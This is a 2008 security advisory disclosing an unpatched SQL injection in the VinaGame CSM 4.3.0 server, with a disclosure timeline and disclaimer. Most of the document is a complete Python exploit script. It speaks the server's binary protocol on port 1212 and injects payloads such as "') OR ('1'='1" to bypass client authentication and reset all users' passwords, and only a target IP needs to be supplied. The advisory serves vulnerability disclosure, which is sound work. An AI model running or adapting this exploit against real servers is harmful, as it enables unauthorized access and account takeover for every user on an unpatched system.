| Title: | SQL injection in VinaGame CSM |
|---|---|
| Severity: | Critical |
| Reporter: | Blue Moon Consulting |
| Products: | VinaGame CSM 4.3.0 |
| Fixed in: | -- |
An SQL injection vulnerability found in VinaGame CSM 4.3.0 allows a rogue client to manipulate SQL commands being run at the CSM server.
A vulnerability in CSM server allows an attacker to inject SQL strings into the process of SQL command creation. An attacker is able to bypass client authentication and reset passwords of all users on the system.
There is no workaround at the moment. Users are advised to contact the vendor directly for a proper fix.
Vendor has not released any patch yet.
Blue Moon Consulting adapts RFPolicy v2.0 in notifying vendors.
| Initial vendor contact: | |
|---|---|
| April 26, 2008: request for communication sent to csm@vinagame.com.vn | |
| Vendor response: | |
| -- | |
| Public disclosure: | |
| May 03, 2008 | |
| Exploit code: | |
import socket
import struct
import threading
import time
SERVER_IP = 'YOU_HAVE_TO_CHANGE_THIS'
CLIENT_IP = '192.168.1.10'
NEW_PASSWORD = 'abc'
def send_command(s, cmd, content):
buf = struct.pack("II", cmd, 0)
buf += content
buf += (208 - len(buf)) * '\x00'
s.send(buf)
def recv(s):
buf = s.recv(208)
while len(buf) > 0:
print len(buf), hex(ord(buf[0]))
buf = s.recv(208)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((SERVER_IP, 1212))
send_command(s, 0x33, "PoC;%s;4.2.5" % CLIENT_IP)
send_command(s, 0x37, "PoC;0;14")
send_command(s, 0x4C, "20480")
send_command(s, 0x34, "0;14")
kicker = threading.Thread(target=recv, args=(s,))
kicker.setDaemon(True)
kicker.start()
for i in range(5):
send_command(s, 0x96, "")
time.sleep(2)
send_command(s, 0x36, "PoC;') OR remaintime > 0 and ('1'='1")
time.sleep(5)
send_command(s, 0x40, "208634")
send_command(s, 0x41, "22631")
send_command(s, 0x35, "1;30;PoC")
for i in range(5):
buf = '\x96' + 207 * '\x00'
s.send(buf)
time.sleep(2)
send_command(s, 0x38, "PoC;') OR ('1'='1;%s" % NEW_PASSWORD)
for i in range(5):
send_command(s, 0x96, "")
time.sleep(2)
s.close()
The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.